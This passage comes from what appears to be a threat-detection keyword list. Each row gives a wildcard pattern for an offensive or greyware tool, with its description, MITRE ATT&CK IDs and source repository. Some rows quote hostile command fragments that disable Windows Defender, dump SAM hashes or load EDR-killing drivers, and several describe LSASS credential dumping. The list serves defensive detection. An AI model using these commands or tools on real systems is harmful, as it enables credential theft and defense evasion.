- T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*SafetyKatz.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*SafetyKatz.exe*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*SafetyKatz.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SafetyKatz.Program*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SafetyKatz.sln*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*safetykatz.txt*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SafetyKatzManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SafetyKatz-master*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*sailay1996*,offensive_tool_keyword,Github Username,github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/sailay1996,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Salsa-tools*,offensive_tool_keyword,Salsa-tools,Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019,T1027 - T1036 - T1059 - T1071 - T1073 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/Hackplayers/Salsa-tools,1,0,N/A,N/A,6,564,140,2020-01-31T22:41:35Z,2019-02-04T21:31:28Z -*sam_the_admin.py*,offensive_tool_keyword,sam-the-admin,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1208 - T1218.005 - T1055.002,TA0006 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WazeHell/sam-the-admin/tree/main/utils,1,0,N/A,N/A,10,929,190,2022-07-10T22:23:13Z,2021-12-11T15:10:30Z -*SamAdduser.exe*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*sambaPipe.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*samdump.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*samdump.py*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*samdump.zip*,offensive_tool_keyword,samdump,Dumping sam,T1003,TA0006,N/A,N/A,Credential Access,https://github.com/nyxgeek/classic_hacking_tools,1,1,N/A,N/A,1,2,0,2023-04-16T02:15:42Z,2023-04-16T01:49:12Z -*samdump2 *,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A -*samdump2 SYSTEM SAM > *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*samdump2.c*,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A -*sample_brc4.json*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*samr_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*samratashok/nishang*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*samrdump.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*sandboxevasion.py*,offensive_tool_keyword,disctopia-c2,Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s,T1105 - T1043 - T1102,TA0003 - TA0008 - TA0002,N/A,N/A,C2,https://github.com/3ct0s/disctopia-c2,1,1,N/A,10,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*SAP_GW_RCE_exploit*,offensive_tool_keyword,SAP_GW_RCE_exploit,This PoC exploits an ACL misconfiguration in the SAP Gateway (port 33xx) that leads to a Remote Command Execution (RCE).SAPanonGWv1.py is the first version of the exploit based on raw packets sent. It does not require any additional modules (Run and Pwn!) SAPanonGWv2.py is the second version of the exploit based on the pysap library,T1078 - T1046 - T1201 - T1021,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/chipik/SAP_GW_RCE_exploit,1,0,N/A,N/A,2,145,48,2020-09-07T13:46:04Z,2019-03-14T13:52:00Z -*sap2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*SauronEye.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sc config WinDefend start= disabled*,greyware_tool_keyword,shell,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*sc create plumber*warpzoneclient*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*sc create Terminator *.sys*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,0,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*sc delete plumber*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #7,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sc_inject_direct.exe*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*sc_inject_indirect.exe*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*sc0tfree*,offensive_tool_keyword,Github Username,github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. Senior Security Consultant @ctxis hosting offensve tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/sc0tfree,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sc0tfree/updog*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*scada_default_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*scan -T list_of_targets.txt*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*scan4all -*.xml*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all -h*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all -tp *,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all.51pwn.com*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all_*.*_linux_amd64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all_*.*_macOS_amd64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all_*.*_macOS_arm64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all_*.*_windows_amd64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all_windows_386.exe*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all_windows_amd64.exe*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all-main*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scanless*,offensive_tool_keyword,scanless,This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0008,N/A,N/A,Information Gathering,https://github.com/vesche/scanless,1,0,N/A,N/A,10,1073,176,2023-08-07T15:12:42Z,2017-05-05T02:53:01Z -*scanner/backdoor*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*scannerport.go -*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,0,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z -*Scanners-Box*,offensive_tool_keyword,Scanners-Box,Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.,T1190 - T1210.001 - T1595 - T1192,TA0007 - TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/We5ter/Scanners-Box,1,0,N/A,N/A,10,7644,2353,2023-08-09T07:09:32Z,2016-12-24T16:07:50Z -*ScanProcessForBadgerConfig*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ScanTCPImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ScareCrow *-loader *,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -encryptionmode *,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 